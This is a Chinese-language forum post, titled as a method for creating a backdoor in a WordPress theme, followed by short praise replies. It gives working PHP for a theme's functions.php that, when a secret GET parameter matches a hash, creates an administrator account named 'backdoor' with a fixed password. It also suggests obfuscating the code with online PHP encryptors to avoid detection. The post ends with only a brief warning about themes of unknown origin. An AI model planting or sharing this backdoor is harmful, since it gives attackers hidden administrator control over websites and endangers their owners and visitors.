在WordPress主题中创建后门的方法
无意中看到这样的代码,大家可以用作测试,但是千万别别有用心的整合到主题中。。(自己玩玩儿还行)add_action( ‘wp_head’, ‘my_backdoor’ );
function my_backdoor() {
if ( md5( $_GET[‘backdoor’] ) == ’34d1f91fb2e514b8576fab1a75a89a6b’ ) {
require( ‘wp-includes/registration.php’ );
if ( !username_exists( ‘backdoor’ ) ) {
$user_id = wp_create_user( ‘backdoor’, ‘banzhuanboy.com’ );
$user = new WP_User( $user_id );
$user->set_role( ‘administrator’ );
}
}
}
例如在主题的 functions.php 文件中添加以上代码,就可以给 WordPress 添加一个能够创建管理员的后门,只需访问 搬砖少年 ,然后就创建了一个用户名为“backdoor”,密码为:“banzhuanboy.com” 的管理员。这样就OK了,但是对于有PHP基础的人,无疑是被发现的命运,那么我们再来给它加密,利用网上的在线PHP加密网站,我们可以很轻松的完成这个操作。
所以强烈建议大家不要随便去下载一些来路不明的 WordPress 主题和插件,说不定就给你的站点安装了一个后门。那我们的损失就打了去了~
搬砖少年原创文章,转载请注明来自
在WordPress主题中创建后门的方法
真心顶 这个是好东西。 顶起顶起顶起 这个源码真好! 专业抢沙发的!哈哈 很不错 牛牛牛牛牛牛牛牛牛 为了源码有什么不能舍得的 鼎力支持!!
页:
[1]
2